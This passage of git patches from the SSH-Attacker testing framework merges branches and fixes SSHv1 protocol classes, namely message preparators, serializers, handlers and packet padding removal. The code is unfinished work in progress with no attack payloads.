de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.security.KeyPair; +import java.security.KeyPairGenerator; +import java.security.NoSuchAlgorithmException; +import java.security.interfaces.RSAPrivateKey; +import java.security.interfaces.RSAPublicKey; +import java.util.List; + +public class ClientSessionKeyMessagePreparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + private HybridKeyExchangeCombiner combiner; + + private SshPublicKey serverKey; + + public ClientSessionKeyMessagePreparator( + Chooser chooser, ClientSessionKeyMessage message, HybridKeyExchangeCombiner combiner) { + super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_PUBLIC_KEY); + this.combiner = combiner; + } + + private void prepareAntiSpoofingCookie(){ + getObject().setAntiSpoofingCookie(chooser.getConfig().getAntiSpoofingCookie()); + } + + private void prepareSessionID(){ + chooser.getContext().getSshContext().getServerKey(); + chooser.getContext().getSshContext().getHostKey(); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + + } + + +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java new file mode 100644 index 000000000..2fb71441d --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java @@ -0,0 +1,43 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.util.zip.CRC32; + +public class ClientSessionKeyMessageSerializer extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + private HybridKeyExchangeCombiner combiner; + + public ClientSessionKeyMessageSerializer( + ClientSessionKeyMessage message, HybridKeyExchangeCombiner combiner) { + super(message); + this.combiner = combiner; + } + + @Override + public void serializeMessageSpecificContents() { + } + + @Override + protected byte[] serializeBytes() { + super.serializeProtocolMessageContents(); + LOGGER.debug( + "[bro] SSHV1 serializied PubKey Message. Content: {}", + ArrayConverter.bytesToHexString(getAlreadySerialized())); + return getAlreadySerialized(); + } +} From efd65258dd1287b2d37d5cd5d9d394e49544c468 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Wed, 16 Aug 2023 22:21:51 +0200 Subject: [PATCH 067/176] Merge Layer_dev into SSHv1_dev --- .../nds/sshattacker/core/config/Config.java | 2 +- .../delegate/ProtocolVersionDelegate.java | 4 ++-- .../core/constants/ProtocolMessageType.java | 0 .../core/layer/context/SshContext.java | 4 ++-- .../core/layer/impl/SSH1Layer.java | 18 +++++---------- .../core/layer/impl/TransportLayer.java | 0 .../core/packet/BinaryPacketSSHv1.java | 6 ++--- .../handler/BinaryPacketHandlerSSHv1.java | 21 ----------------- .../ClientSessionKeyMessageHandler.java | 8 ------- .../ServerPublicKeyMessageHandler.java | 23 +++++++++++-------- .../ssh1/message/ClientSessionKeyMessage.java | 10 +++----- .../message/VersionExchangeMessageSSHV1.java | 5 ++-- .../parser/ClientSessionKeyMessageParser.java | 14 +---------- .../ClientSessionKeyMessagePreparator.java | 20 ++++------------ .../ClientSessionKeyMessageSerializer.java | 19 +++------------ .../ServerPublicKeyMessageSerializer.java | 9 -------- ...VersionExchangeMessageSSHV1Serializer.java | 6 ----- 17 files changed, 42 insertions(+), 127 deletions(-) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandlerSSHv1.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index a30bc633b..54d9883e5 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -503,7 +503,7 @@ public Config() { defaultServerConnection = new InboundConnection("server", 65222, "localhost"); protocolVersion = ProtocolVersion.SSH2; - defaultLayerConfiguration = LayerConfiguration.SSHv2; + defaultLayerConfiguration = LayerConfiguration.SSHV2; // region VersionExchange initialization clientVersion = "SSH-2.0-OpenSSH_9.0"; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ProtocolVersionDelegate.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ProtocolVersionDelegate.java index cfe35f553..9c244480a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ProtocolVersionDelegate.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ProtocolVersionDelegate.java @@ -41,9 +41,9 @@ public void applyDelegate(Config config) { config.setProtocolVersion(protocolVersion); TransportHandlerType th = TransportHandlerType.TCP; if (config.getProtocolVersion().isSSHv2()) { - config.setDefaultLayerConfiguration(LayerConfiguration.SSHv2); + config.setDefaultLayerConfiguration(LayerConfiguration.SSHV2); } else if (config.getProtocolVersion().isSSHv1()) { - config.setDefaultLayerConfiguration(LayerConfiguration.SSHv1); + config.setDefaultLayerConfiguration(LayerConfiguration.SSHV1); } else { LOGGER.error("[bro] does not initalize with sshv1 or sshv2"); throw new RuntimeException(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageType.java deleted file mode 100644 index e69de29bb..000000000 diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index e110dac77..fa9e7971b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.layer.context; -import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; @@ -1006,7 +1005,8 @@ public AuthenticationMethodSSHv1 getChosenAuthenticationMethod() { return chosenAuthenticationMethod; } - public void setChosenAuthenticationMethod(AuthenticationMethodSSHv1 chosenAuthenticationMethod) { + public void setChosenAuthenticationMethod( + AuthenticationMethodSSHv1 chosenAuthenticationMethod) { this.chosenAuthenticationMethod = chosenAuthenticationMethod; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index eb14779a4..a57914fc8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -18,7 +18,7 @@ import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; import de.rub.nds.sshattacker.core.protocol.message.*;*/ -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.exceptions.EndOfStreamException; import de.rub.nds.sshattacker.core.exceptions.TimeoutException; import de.rub.nds.sshattacker.core.layer.LayerConfiguration; @@ -54,7 +54,7 @@ public SSH1Layer(SshContext context) { @Override public LayerProcessingResult sendConfiguration() throws IOException { LayerConfiguration configuration = getLayerConfiguration(); - ProtocolMessageType runningProtocolMessageType = null; + MessageIdConstant runningProtocolMessageType = null; ByteArrayOutputStream collectedMessageStream = new ByteArrayOutputStream(); if (configuration != null) { LOGGER.debug( @@ -71,7 +71,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { LOGGER.debug("[bro] here i am with sending the message"); - runningProtocolMessageType = message.getProtocolMessageType(); + runningProtocolMessageType = message.getMessageIdConstant(); processMessage(message, collectedMessageStream); addProducedContainer(message); flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); @@ -86,7 +86,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { if (runningProtocolMessageType == null) { LOGGER.debug("[bro] Protocol Message Type is null!"); } else { - LOGGER.debug("ProtocolMessageType: {}", runningProtocolMessageType.getValue()); + LOGGER.debug("ProtocolMessageType: {}", runningProtocolMessageType.getId()); } LOGGER.debug("[bro] " + "flushing {} to lower layer", collectedMessageStream.toByteArray()); @@ -122,7 +122,7 @@ private void processMessage( } private void flushCollectedMessages( - ProtocolMessageType runningProtocolMessageType, ByteArrayOutputStream byteStream) + MessageIdConstant runningProtocolMessageType, ByteArrayOutputStream byteStream) throws IOException { LOGGER.debug( @@ -130,10 +130,7 @@ private void flushCollectedMessages( byteStream.toByteArray(), getLowerLayer().getLayerType()); if (byteStream.size() > 0) { - getLowerLayer() - .sendData( - new PacketLayerHint(runningProtocolMessageType), - byteStream.toByteArray()); + getLowerLayer().sendData(byteStream.toByteArray()); byteStream.reset(); } } @@ -174,10 +171,7 @@ public LayerProcessingResult receiveData() { } while (shouldContinueProcessing()); } catch (TimeoutException ex) { LOGGER.debug(ex); - } catch (EndOfStreamException ex) { - LOGGER.debug("Reached end of stream, cannot parse more messages", ex); } - return getLayerResult(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TransportLayer.java deleted file mode 100644 index e69de29bb..000000000 diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java index 6b3e9167e..0a1fbba84 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/BinaryPacketSSHv1.java @@ -14,7 +14,7 @@ import de.rub.nds.modifiablevariable.singlebyte.ModifiableByte; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.layer.data.DataContainer; -import de.rub.nds.sshattacker.core.packet.handler.BinaryPacketHandlerSSHv1; +import de.rub.nds.sshattacker.core.layer.data.Handler; import de.rub.nds.sshattacker.core.packet.parser.BinaryPacketParserSSHv1; import de.rub.nds.sshattacker.core.packet.preparator.BinaryPacketPreparatorSSHv1; import de.rub.nds.sshattacker.core.packet.serializer.BinaryPacketSerializerSSHv1; @@ -207,7 +207,7 @@ public BinaryPacketSerializerSSHv1 getSerializer(SshContext context) { } @Override - public BinaryPacketHandlerSSHv1 getHandler(SshContext context) { - return new BinaryPacketHandlerSSHv1(context); + public Handler getHandler(SshContext context) { + throw new UnsupportedOperationException("Not supported yet."); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandlerSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandlerSSHv1.java deleted file mode 100644 index a38f65c7e..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/handler/BinaryPacketHandlerSSHv1.java +++ /dev/null @@ -1,21 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.packet.handler; - -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; - -public class BinaryPacketHandlerSSHv1 extends AbstractPacketHandler { - - public BinaryPacketHandlerSSHv1(SshContext context) { - super(context); - } - - @Override - public void adjustContext(BinaryPacketSSHv1 object) {} -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java index 32812656f..4caa7029f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -10,14 +10,9 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.nio.charset.StandardCharsets; -import java.security.MessageDigest; -import java.security.NoSuchAlgorithmException; - public class ClientSessionKeyMessageHandler extends SshMessageHandler { private static final Logger LOGGER = LogManager.getLogger(); @@ -34,9 +29,6 @@ public ClientSessionKeyMessageHandler(SshContext context) { @Override public void adjustContext(ClientSessionKeyMessage message) { - - - // KeyExchangeUtil.handleHostKeyMessage(sshContext, message); // setRemoteValues(message); /* sshContext.getChooser().getHybridKeyExchange().combineSharedSecrets(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java index 1cc30ca14..c265610fc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java @@ -10,12 +10,11 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - import java.nio.charset.StandardCharsets; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public class ServerPublicKeyMessageHandler extends SshMessageHandler { @@ -33,9 +32,16 @@ public ServerPublicKeyMessageHandler(SshContext context) { @Override public void adjustContext(ServerPublicKeyMessage message) { - String serverKeyModulus = new String(message.getServerKey().getPublicKey().getModulus().toByteArray(), StandardCharsets.UTF_8); - String hostKeyModulus = new String(message.getHostKey().getPublicKey().getModulus().toByteArray(), StandardCharsets.UTF_8); - String cookie = new String(message.getAntiSpoofingCookie().getValue(), StandardCharsets.UTF_8); + String serverKeyModulus = + new String( + message.getServerKey().getPublicKey().getModulus().toByteArray(), + StandardCharsets.UTF_8); + String hostKeyModulus = + new String( + message.getHostKey().getPublicKey().getModulus().toByteArray(), + StandardCharsets.UTF_8); + String cookie = + new String(message.getAntiSpoofingCookie().getValue(), StandardCharsets.UTF_8); String concatenated = serverKeyModulus + hostKeyModulus + cookie; try { @@ -50,10 +56,9 @@ public void adjustContext(ServerPublicKeyMessage message) { sshContext.setServerKey(message.getServerKey()); sshContext.setHostKey(message.getHostKey()); sshContext.setAntiSpoofingCookie(message.getAntiSpoofingCookie().getValue()); - //TODO: Choose correct CipherMethod - - //TODO: Choose correct AuthenticationMethod + // TODO: Choose correct CipherMethod + // TODO: Choose correct AuthenticationMethod // KeyExchangeUtil.handleHostKeyMessage(sshContext, message); // setRemoteValues(message); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java index bee9ba3a2..94aa71e76 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java @@ -10,13 +10,9 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; -import de.rub.nds.sshattacker.core.constants.AuthenticationMethodSSHv1; import de.rub.nds.sshattacker.core.constants.CipherMethod; import de.rub.nds.sshattacker.core.constants.ProtocolFlag; import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; -import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; -import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; -import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; @@ -26,7 +22,6 @@ import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ClientSessionKeyMessageParser; import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ClientSessionKeyMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ClientSessionKeyMessageSerializer; - import java.io.InputStream; import java.util.List; @@ -57,10 +52,11 @@ public void setAntiSpoofingCookie(ModifiableByteArray antiSpoofingCookie) { } public void setAntiSpoofingCookie(byte[] antiSpoofingCookie) { - this.antiSpoofingCookie = ModifiableVariableFactory.safelySetValue(this.antiSpoofingCookie,antiSpoofingCookie); + this.antiSpoofingCookie = + ModifiableVariableFactory.safelySetValue( + this.antiSpoofingCookie, antiSpoofingCookie); } - public ModifiableByteArray getEncryptedSessioKey() { return encryptedSessioKey; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java index e7413adc3..d736e05fb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/VersionExchangeMessageSSHV1.java @@ -9,7 +9,7 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.string.ModifiableString; -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.ssh1.handler.VersionExchangeMessageSSHV1Handler; @@ -27,10 +27,11 @@ public class VersionExchangeMessageSSHV1 extends ProtocolMessage { private static final Logger LOGGER = LogManager.getLogger(); private HybridKeyExchangeCombiner combiner; @@ -98,9 +89,6 @@ public ClientSessionKeyMessageParser(SshContext context, InputStream stream) { this.combiner = combiner;*/ } - - - private void parseCRC(ClientSessionKeyMessage message) { byte[] CRC = parseByteArrayField(4); LOGGER.debug("CRC: {}", CRC); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java index bc31bf5f1..a2a2a3e3f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -7,27 +7,18 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; -import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; -import de.rub.nds.sshattacker.core.exceptions.CryptoException; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.security.KeyPair; -import java.security.KeyPairGenerator; -import java.security.NoSuchAlgorithmException; -import java.security.interfaces.RSAPrivateKey; -import java.security.interfaces.RSAPublicKey; -import java.util.List; - -public class ClientSessionKeyMessagePreparator extends SshMessagePreparator { +public class ClientSessionKeyMessagePreparator + extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); private HybridKeyExchangeCombiner combiner; @@ -40,11 +31,11 @@ public ClientSessionKeyMessagePreparator( this.combiner = combiner; } - private void prepareAntiSpoofingCookie(){ + private void prepareAntiSpoofingCookie() { getObject().setAntiSpoofingCookie(chooser.getConfig().getAntiSpoofingCookie()); } - private void prepareSessionID(){ + private void prepareSessionID() { chooser.getContext().getSshContext().getServerKey(); chooser.getContext().getSshContext().getHostKey(); } @@ -52,8 +43,5 @@ private void prepareSessionID(){ @Override public void prepareMessageSpecificContents() { LOGGER.debug("Preparring now..."); - } - - } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java index 2fb71441d..ef5bf4b27 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java @@ -7,17 +7,14 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; -import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.util.zip.CRC32; - -public class ClientSessionKeyMessageSerializer extends SshMessageSerializer { +public class ClientSessionKeyMessageSerializer + extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); private HybridKeyExchangeCombiner combiner; @@ -29,15 +26,5 @@ public ClientSessionKeyMessageSerializer( } @Override - public void serializeMessageSpecificContents() { - } - - @Override - protected byte[] serializeBytes() { - super.serializeProtocolMessageContents(); - LOGGER.debug( - "[bro] SSHV1 serializied PubKey Message. Content: {}", - ArrayConverter.bytesToHexString(getAlreadySerialized())); - return getAlreadySerialized(); - } + public void serializeMessageSpecificContents() {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java index 16484741c..9a5f701dd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ServerPublicKeyMessageSerializer.java @@ -103,13 +103,4 @@ private void serializeHostKeyBytes() { ArrayConverter.bytesToHexString( message.getHostKey().getPublicKey().getModulus().toByteArray())); } - - @Override - protected byte[] serializeBytes() { - super.serializeProtocolMessageContents(); - LOGGER.debug( - "[bro] SSHV1 serializied PubKey Message. Content: {}", - ArrayConverter.bytesToHexString(getAlreadySerialized())); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/VersionExchangeMessageSSHV1Serializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/VersionExchangeMessageSSHV1Serializer.java index 88e57fcfc..259706ba8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/VersionExchangeMessageSSHV1Serializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/VersionExchangeMessageSSHV1Serializer.java @@ -60,10 +60,4 @@ protected void serializeProtocolMessageContents() { serializeComment(); serializeEndOfMessageSequence(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } From be5d46fc34496861fa15e5e1731bb9ddec718f4f Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 21 Aug 2023 22:30:03 +0200 Subject: [PATCH 068/176] Fix merge-errors and fittin the sshv1-class --- .../core/layer/impl/PacketLayer.java | 27 ++++ .../core/layer/impl/SSH1Layer.java | 153 ++++++++++++++++-- .../core/packet/AbstractPacket.java | 3 - 3 files changed, 166 insertions(+), 17 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index ed141253a..f8adf42da 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.layer.impl; +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.CipherMode; import de.rub.nds.sshattacker.core.constants.CompressionAlgorithm; @@ -24,6 +25,7 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.packet.BinaryPacket; +import de.rub.nds.sshattacker.core.packet.BinaryPacketSSHv1; import de.rub.nds.sshattacker.core.packet.BlobPacket; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipher; import de.rub.nds.sshattacker.core.packet.cipher.PacketCipherFactory; @@ -39,6 +41,7 @@ import de.rub.nds.sshattacker.core.protocol.transport.parser.*; import java.io.IOException; import java.io.InputStream; +import java.util.Arrays; import java.util.LinkedList; import java.util.List; import org.apache.logging.log4j.LogManager; @@ -162,6 +165,30 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException context.getPacketLayer().getDecryptor().decrypt(packet); context.getPacketLayer().getDecompressor().decompress(packet); + // for SSHv1 we need to remove the padding here! //TODO: can be changed? + if (packet instanceof BinaryPacketSSHv1) { + BinaryPacketSSHv1 binaryPacketSSHv1 = (BinaryPacketSSHv1) packet; + + int paddingLenght = (8 - binaryPacketSSHv1.getLength().getValue() % 8); + byte[] padding = Arrays.copyOfRange(packet.getPayload().getValue(), 0, paddingLenght); + byte[] cleanContent = + Arrays.copyOfRange( + packet.getPayload().getValue(), + paddingLenght, + binaryPacketSSHv1.getLength().getValue() + paddingLenght); + + LOGGER.debug( + "Lenght = {}, so padding is {} long and has {} as value, clean is now {} which is {} long", + binaryPacketSSHv1.getLength().getValue(), + paddingLenght, + padding, + ArrayConverter.bytesToHexString(cleanContent), + cleanContent.length); + packet.setPayload(ModifiableVariableFactory.safelySetValue(null, cleanContent)); + } else { + packet.setPayload(packet.getPayload()); + } + LOGGER.debug( "[bro] Decompressed Payload: {}", ArrayConverter.bytesToHexString(packet.getPayload())); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 